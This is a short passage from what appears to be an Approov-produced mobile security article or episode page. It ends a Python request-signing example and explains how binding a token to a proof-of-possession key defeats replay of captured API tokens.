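    print(validate_request(token, "POST", "/v1/valve", body, ts,
                           sign_request(key, "POST", "/v1/valve", body, ts)))
```

The point of the `cnf` binding is that a token captured from app-to-API traffic is useless on its own: a replay against a different path or with a different body fails the proof of possession, and a token minted for another app identifier, or presented after its short `exp`, is rejected before the signature over the request is even checked.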


HOSTED BY

Skye Macintyre

Produced by Approov Mobile Security
